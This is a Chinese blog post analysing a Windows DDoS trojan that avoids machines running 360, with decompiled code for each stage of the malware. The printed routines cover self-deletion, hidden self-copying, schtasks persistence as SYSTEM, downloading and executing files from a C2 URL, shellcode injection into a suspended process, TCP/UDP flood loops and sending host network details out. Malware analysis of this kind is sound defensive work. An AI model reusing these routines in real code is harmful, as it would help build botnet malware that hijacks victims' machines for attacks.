标签:
摘要
事件起因:
前一段时间国外网站曝出一个中国的受害者来执行DDOS的一个木马—Chind,在该木马准备长攻击前,会先检测用户是否使用360,如果检测到就会停止攻击.这里就对该木马行为进行详细报告
木马危害:
该木马长期潜伏在用户电脑中,使用户变肉鸡,在适当时候会对指定目标进行攻击(攻击时间由发起者决定),对被攻击目标进行DOS攻击。大量的肉鸡同时对一个目标发送大量数据,会导致被攻击目标网络瘫痪,而对于中招用户来说一旦被攻击的网站对攻击事件进行追查,能查到的直接源头就是这些无辜的中招用户
木马行为分析
0x01 使用upx压缩壳减小体积
从压缩前后可以看到体积减小了一半
0x02 创建互斥量,保证只有一个木马在运行
1.使用sleep函数使木马进入短暂休眠状态(该木马使用大量sleep函数,后面就不在提出了)
1: SetErrorMode(0x8003u);
2: SetUnhandledExceptionFilter(TopLevelExceptionFilter);
3: Sleep(0x2710u);
2.创建唯一标识"Global\\3672a9586a5f342b2ca070851e425db6"
1: hObject = CreateMutexW(0, 1, L"Global\\3672a9586a5f342b2ca070851e425db6");
3.互斥量创建是否成功
1: if ( hObject && GetLastError() == 183 )
2: {
3: DleteItSelf();
4: TopLevelExceptionFilter(v5);
5: }
1: if ( GetModuleFileNameW(0, &Filename, 0x104u) )
2: {
3: if ( GetShortPathNameW(&Filename, &Filename, 0x104u) )
4: {
5: lstrcpyW(&String1, L"/c del ");
6: lstrcatW(&String1, &Filename);
7: lstrcatW(&String1, L" >> NUL");
8: if ( GetEnvironmentVariableW(L"ComSpec", &Filename, 0x104u) )
9: {
10: if ( (signed int)ShellExecuteW(0, 0, &Filename, &String1, 0, 0) > 32 )
11: result = 1;
12: }
13: }
3.2进程退出
1:
2: v0 = GetCurrentProcess();
3: return TerminateProcess(v0, 0);
4.如果创建互斥量成功,根据当前进程具有的系统权限,选择路径进行自我复制
1: BOOL sub_405DF0()
2: {
3: WCHAR *v0; // ST04_4@1
4: WCHAR *v1; // eax@1
5:
6: v0 = GetPath();
7: v1 = GetModuleFileName();
8: return CopyFileW(v1, v0, 0);
9: }
4.1获取复制自身所到的路径GetPath()
1: if ( judgegrade() )
2: {
3: GetWindowsDirectoryW(&FileName, 0x104u);
4: PathAppendW(&FileName, L"\\System\\");
5: CreateDirectoryW(&FileName, 0);
6: PathAppendW(&FileName, L"\\Init\\");
7: CreateDirectoryW(&FileName, 0);
8: SetFileAttributesW(&FileName, 2u);
9: PathAppendW(&FileName, L"\\wininit.exe");
10: }
11: else if ( SHGetFolderPathW(0, 26, 0, 0, &FileName) >= 0 )
12: {
13: PathAppendW(&FileName, L"\\Microsoft\\");
14: CreateDirectoryW(&FileName, 0);
15: PathAppendW(&FileName, L"\\System\\");
16: CreateDirectoryW(&FileName, 0);
17: SetFileAttributesW(&FileName, 2u);
18: PathAppendW(&FileName, L"\\wininit.exe");
19: }
4.1.1 判断系统的权限 JudgeGrade()
1: if ( AllocateAndInitializeSid(&pIdentifierAuthority, 2u, 0x20u, 0x220u, 0, 0, 0, 0, 0, 0, &pSid) )
2: {
3: if ( !CheckTokenMembership(0, pSid, &IsMember) )
4: v3 = GetLastError();
5: }
6: else
7: {
8: v3 = GetLastError();
9: }
10: if ( pSid )
11: {
12: FreeSid(pSid);
13: pSid = 0;
14: }
15: if ( v3 )
16: {
17: v1 = v3;
18: HandleExcpetion((int)&v1, (int)&unk_433B18);
19: }
5.该木马通过对当前进程的权限的判断,选择一种方式使木马长期驻扎在内存中
5.1判断当前进程运行的权限是否是管理员权限(前面已经提到过,不在重复)
5.2如果是管理员权限,则直接写入注册表,开机自启动
5.3如果不是管理员权限,先判断系统版本
5.3.1如果系统版本是一下版本中的一个,则直接创建注册表,达到开机自启动就可以了(同5.2)
Windows Vista
Windows Server 2003 R2
Windows Home Server
Windows Server 2003Windows XP Professional x64 Edition
Windows XP
Windows 2000
5.3.2如果系统版本不是以上中的一个,则调用schtask.exe来创建服务,使木马不仅能够开机自启动,还能够以管理员权限运行
schtasks.exe命令行解析
/sc onstart 指定该服务是开机时便开始运行
/tn Microsoft\\Windows\\Shell\\Init 指定任务名为"‘Microsoft\\Windows\\Shell\\Init"
/tr \"\\\"%s\\\"\" 制定任务路径
/ru system 指定该任务具有system权限
1: GetSystemDirectoryW(&Buffer, 0x104u);
2: wsprintfW(&File, L"%s\\schtasks.exe", &Buffer);
3: if ( sub_406400() )
4: {
5: sub_406030();
6: }
7: else
8: {
9: v0 = sub_404CB0();
10: wsprintfW(
11: &Parameters,
12: L"/create /F /sc onstart /tn Microsoft\\Windows\\Shell\\Init /tr \"\\\"%s\\\"\" /ru system",
13: v0);
14: }
15: DeleteTask();
16: Sleep(0x2710u);
17: return ShellExecuteW(0, L"open", &File, &Parameters, 0, 0);
1: wsprintfW(&Parameters, L"/delete /TN Microsoft\\Windows\\Shell\\Init /F", &Buffer);
2: eturn ShellExecuteW(0, L"open", &File, &Parameters, 0, 0);
0x06创建进程,删除自身
6.1运行刚刚复制的替身
6.2删除自身(同3.1)
0x07 测试网络是否畅通
如果不畅通,木马会开始不停的休眠,唤醒后继续尝试访问,到达一定次数后还没网络时则木马会自动退出
1: while ( 1 )
2: {
3: v10 = TestInter();
4: if ( v10 )
5: break;
6: Sleep(0x1D4C0u);
7: ++v12;
8: if ( v12 >= 30 )
9: ExitProcess(0);
10: }
7.1用到的测试网址都是经常用到的网址
1: for ( i = 0; i < 10; ++i )
2: {
3: if ( SetInterConn("http://www.baidu.com/") )
4: return 1;
5: if ( SetInterConn("http://www.microsoft.com/") )
6: return 1;
7: if ( SetInterConn("http://www.qq.com/") )
8: return 1;
9: }
7.1.1连接设置 SetInterConn()
1: v3 = 0;
2: hInternet = InternetOpenA(&byte_4326BF, 1u, 0, 0, 0);
3: Buffer = 5000;
4: InternetSetOptionA(hInternet, 2u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_TIMEOUT
5: InternetSetOptionA(hInternet, 5u, &Buffer, 4u); //INTERNET_OPTION_SEND_TIMEOUT
6: InternetSetOptionA(hInternet, 6u, &Buffer, 4u); //INTERNET_OPTION_RECEIVE_TIMEOUT
7: Buffer = 5;
8: InternetSetOptionA(hInternet, 3u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_RETRIES
9: InternetSetOptionA(hInternet, 0x4Du, 0, 0);
10: v4 = InternetOpenUrlA(hInternet, lpszUrl, &byte_4326C3, 0, 0, (DWORD_PTR)&dwContext); //INTERNET_OPTION_IGNORE_OFFLINE
11: if ( v4 )
12: v3 = 1;
13: if ( v4 )
14: InternetCloseHandle(v4);
15: if ( hInternet )
16: InternetCloseHandle(hInternet);
17: return v3;
1: if ( judgegrade() )
2: {
3: GetWindowsDirectoryW(&pszPath, 0x104u);
4: PathAppendW(&pszPath, L"\\Logs\\");
5: CreateDirectoryW(&pszPath, 0);
6: PathAppendW(&pszPath, L"\\WMI\\");
7: CreateDirectoryW(&pszPath, 0);
8: PathAppendW(&pszPath, L"\\Event\\");
9: CreateDirectoryW(&pszPath, 0);
10: SetFileAttributesW(&pszPath, 2u);
11: PathAppendW(&pszPath, L"\\SystemEvent.evt");
12: }
13: else if ( SHGetFolderPathW(0, 26, 0, 0, &pszPath) >= 0 )
14: {
15: PathAppendW(&pszPath, L"\\Microsoft\\");
16: CreateDirectoryW(&pszPath, 0);
17: PathAppendW(&pszPath, L"\\System\\");
18: CreateDirectoryW(&pszPath, 0);
19: SetFileAttributesW(&pszPath, 2u);
20: PathAppendW(&pszPath, L"\\wow64.dll");
21: }
22: return &pszPath;
0x09命令文件读取成功
9.1读取命令配置文件
1: ReadFile(hFile, lpBuffer, nNumberOfBytesToRead, &NumberOfBytesRead, 0);
9.1解密命令配置文件
该你文件采用Salsa20加密算法对命令配置文件进行了一次加密,从下面这里的反汇编代码就可以看出是Salsa20算法
1: while ( v102 );
2: sub_40BBE0(a1, v6 + v101);
3: sub_40BBE0(v70 + 4, v7 + v100);
4: sub_40BBE0(v71 + 8, v8 + v99);
5: sub_40BBE0(v72 + 12, v9 + v98);
6: sub_40BBE0(v73 + 16, v97 + v111);
7: sub_40BBE0(v74 + 20, v96 + v116);
8: sub_40BBE0(v75 + 24, v95 + v110);
9: sub_40BBE0(v76 + 28, v94 + v109);
10: sub_40BBE0(v77 + 32, v93 + v108);
11: sub_40BBE0(v78 + 36, v92 + v107);
12: sub_40BBE0(v79 + 40, v91 + v114);
13: sub_40BBE0(v80 + 44, v90 + v106);
14: sub_40BBE0(v81 + 48, v89 + v105);
15: sub_40BBE0(v82 + 52, v88 + v104);
16: sub_40BBE0(v83 + 56, v87 + v103);
17: sub_40BBE0(v84 + 60, v86 + v112);
18: return 0
9.2对接受到的命令进行相应的操作
该木马能接受的命令如下
update:储当前的cnc到一个加密文件,并报告给服务器。然后,下载并执行最新版的木马,接着删除旧版木马。(篇幅有限,只列出部分)
1: GetTempPathA(0x104u, &Buffer);
2: GetTempFileNameA(&Buffer, &byte_4326CB, 0, &TempFileName);
3: DeleteFileA(&TempFileName);
4: v8 = (int)&v11;
5: do
6: v9 = *(_BYTE *)(v8++ + 1);
7: while ( v9 );
8: v4 = v8;
9: *(_DWORD *)v8 = 1702389038;
10: *(_BYTE *)(v4 + 4) = 0;
11: DeleteUrlCacheEntryA(lpszUrlName);
12: URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0);
13: DeleteUrlCacheEntryA(lpszUrlName);
14: if ( sub_405800(&TempFileName, a3) )
15: {
16: memset(&StartupInfo, 0, 0x44u);
17: StartupInfo.cb = 68;
18: ProcessInformation.hProcess = 0;
19: ProcessInformation.hThread = 0;
20: ProcessInformation.dwProcessId = 0;
21: ProcessInformation.dwThreadId = 0;
22: CloseHandle(hObject);
23: CreateProcessA(&TempFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
24: DeleteItself();
25: TopLevelExceptionFilter();
26: }
27: result = DeleteFileA(&TempFileName);
url_exec:从指定的URL上下载文件,并使用WinExec来执行这个文件
1: GetTempPathA(0x104u, &Buffer);
2: GetTempFileNameA(&Buffer, &PrefixString, 0, &TempFileName);
3: DeleteFileA(&TempFileName);
4: v4 = &v6;
5: do
6: v2 = (v4++)[1];
7: while ( v2 );
8: *(_DWORD *)v4 = 1702389038;
9: v4[4] = 0;
10: DeleteUrlCacheEntryA(lpszUrlName);
11: URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0);
12: DeleteUrlCacheEntryA(lpszUrlName);
13: result = sub_405800(&TempFileName, a2);
14: if ( result )
15: result = WinExec(&TempFileName, 0);
shellcode_exec:创建一个挂起进程,并把shellcode注入到这个进程然后,恢复进程。
1: memset(&StartupInfo, 0, 0x44u);
2: StartupInfo.cb = 68;
3: ProcessInformation.hProcess = 0;
4: ProcessInformation.hThread = 0;
5: ProcessInformation.dwProcessId = 0;
6: ProcessInformation.dwThreadId = 0;
7: GetModuleFileNameW(0, &Filename, 0x104u);
8: result = CreateProcessW(&Filename, 0, 0, 0, 0, 4u, 0, 0, &StartupInfo, &ProcessInformation);
9: if ( result )
10: {
11: memset(&Context, 0, 0x2CCu);
12: Context.ContextFlags = 65537;
13: GetThreadContext(ProcessInformation.hThread, &Context);
14: lpBuffer = (LPCVOID)sub_407DF0(a1, &dwSize);
15: lpBaseAddress = VirtualAllocEx(ProcessInformation.hProcess, 0, dwSize, 0x3000u, 0x40u);
16: WriteProcessMemory(ProcessInformation.hProcess, lpBaseAddress, lpBuffer, dwSize, 0);
17: v3 = (void *)lpBuffer;
18: j_j__free((void *)lpBuffer);
19: Context.Eip = (DWORD)lpBaseAddress;
20: SetThreadContext(ProcessInformation.hThread, &Context);
21: ResumeThread(ProcessInformation.hThread);
22: CloseHandle(ProcessInformation.hThread);
23: result = CloseHandle(ProcessInformation.hProcess);
attack:利用生成的数据,通过TCP或UDP socket来攻击目标IP.
attack_reset:重置攻击目标的地址
cnc:指定cnc服务器的位置,木马会联系这个服务器来获取命令
cnc_reset:重置CNC服务器地址为默认值
report:指定报告服务器的地址
report_reset:重置报告服务器的地址为默认值
0x10木马利用TC或者UDP创建socket()来对目标地址进行访问,实现DDOS攻击
10.1创建TCP连接
1: name.sa_family = 2;
2: *(_DWORD *)&name.sa_data[2] = inet_addr(cp);
3: if ( v10 && v11 )
4: *v11 = 58;
5: while ( 1 )
6: {
7: s = socket(2, 1, 6);
8: if ( v10 )
9: {
10: *(_WORD *)&name.sa_data[0] = htons(v10);
11: }
12: else
13: {
14: v1 = HandleError();
15: *(_WORD *)&name.sa_data[0] = htons(v1);
16: }
17: connect(s, &name, 16);
18: argp = 1;
19: ioctlsocket(s, -2147195266, &argp);
20: send(s, buf, len, 0);
21: shutdown(s, 1);
22: closesocket(s);
10.2创建UDP连接
1: result = socket(2, 2, 17);
2: s = result;
3: if ( result >= 0 )
4: {
5: *(_DWORD *)&to.sa_family = 0;
6: *(_DWORD *)&to.sa_data[2] = 0;
7: *(_DWORD *)&to.sa_data[6] = 0;
8: *(_DWORD *)&to.sa_data[10] = 0;
9: to.sa_family = 2;
10: *(_DWORD *)&to.sa_data[2] = inet_addr(cp);
11: while ( 1 )
12: {
13: v9 = v10++ % 0x2710u;
14: if ( !v9 )
15: {
16: v2 = HandleError();
17: memset(&buf, v2, 0x2000u);
18: }
19: v3 = HandleError();
20: *(_WORD *)&to.sa_data[0] = htons(v3);
21: len = HandleError() % 4096 + 4096;
22: sendto(s, &buf, len, 0, &to, 16);
0x11在创建DOS攻击线程后,该木马还会继续创建一个线程,到某个只大牛股的网址去下载文件,然后对文件进行解密和执行获取到的命令
1: hInternet = InternetOpenA(&szAgent, 1u, 0, 0, 0);
2: Buffer = 5000;
3: InternetSetOptionA(hInternet, 2u, &Buffer, 4u);
4: InternetSetOptionA(hInternet, 5u, &Buffer, 4u);
5: InternetSetOptionA(hInternet, 6u, &Buffer, 4u);
6: Buffer = 5;
7: InternetSetOptionA(hInternet, 3u, &Buffer, 4u);
8: InternetSetOptionA(hInternet, 0x4Du, 0, 0);
9: DeleteUrlCacheEntryA(lpszUrlName);
10: hFile = InternetOpenUrlA(hInternet, lpszUrlName, &szHeaders, 0, 0x4040300u, (DWORD_PTR)&dwContext);
11: if ( hFile )
12: {
13: v16 = 0;
14: v3 = About_Expection_badalloc_4(0);
15: v14 = v3;
16: do
17: {
18: while ( !InternetReadFile(hFile, &v18, 0x1000u, &dwNumberOfBytesRead) )
19: ;
20: v9 = dwNumberOfBytesRead + v16;
21: v4 = About_Expection_badalloc_4(dwNumberOfBytesRead + v16);
22: v10 = v4;
23: memmove_0(v4, v14, v16);
24: v5 = v14;
25: j_j__free(v14);
26: memmove_0((char *)v10 + v16, &v18, dwNumberOfBytesRead);
27: v14 = v10;
28: v16 = v9;
29: }
30: while ( dwNumberOfBytesRead );
31: v12 = M_decode(v14, v16);
32: if ( v12 )
33: {
34: v8 = AcceptOrder((int)v12, 0);
35: v7 = v12;
36: j_j__free(v12);
37: }
0x12获取网卡信息
12.1通过调用 GetAdaptersInfo函数获取Adapter Name,Mac,Ip,NetMask,NetGate等信息
1: GetAdaptersInfo(&AdapterInfo, &SizePointer);
2: v3 = &AdapterInfo;
3: memset(&unk_43F1C8, 0, 0x1000u);
4: sub_41A958((int)&unk_43F1C8, "%d_", 32);
5: do
6: {
7: v4 = v3->Address;
8: sub_41A958(
9: (int)&unk_43F1C8,
10: "%s_%02x%02x%02x%02x%02x%02x%02x%02x",
11: &unk_43F1C8,
12: v3->Address[0],
13: v3->Address[1],
14: v3->Address[2],
15: v3->Address[3],
16: v3->Address[4],
17: v3->Address[5],
18: v3->Address[6],
19: v3->Address[7]);
20: v3 = v3->Next;
21: }
12.2通过调用InternetOpeUrl()将刚刚获取到的本机信息发送至目标服务器
1: hInternet = InternetOpenA(&byte_4326C6, 1u, 0, 0, 0);
2: Buffer = 5000;
3: InternetSetOptionA(hInternet, 2u, &Buffer, 4u);
4: InternetSetOptionA(hInternet, 5u, &Buffer, 4u);
5: InternetSetOptionA(hInternet, 6u, &Buffer, 4u);
6: Buffer = 5;
7: InternetSetOptionA(hInternet, 3u, &Buffer, 4u);
8: InternetSetOptionA(hInternet, 0x4Du, 0, 0);
9: sub_41A958((int)&szUrlName, "%s%s", a1, a2);
10: DeleteUrlCacheEntryA(&szUrlName);
11: result = InternetOpenUrlA(hInternet, &szUrlName, &byte_4326C7, 0, 0, (DWORD_PTR)&dwContext);
12: v5 = result;
13: if ( result )
14: v4 = 1;
15: if ( v5 )
16: result = (HINTERNET)InternetCloseHandle(v5);
17: if ( hInternet )
18: result = (HINTERNET)InternetCloseHandle(hInternet);
现在这个网站已经不能反问,所以也返回不了数据了。
标签:
原文地址:http://www.cnblogs.com/kangxiaopao/p/4653630.html
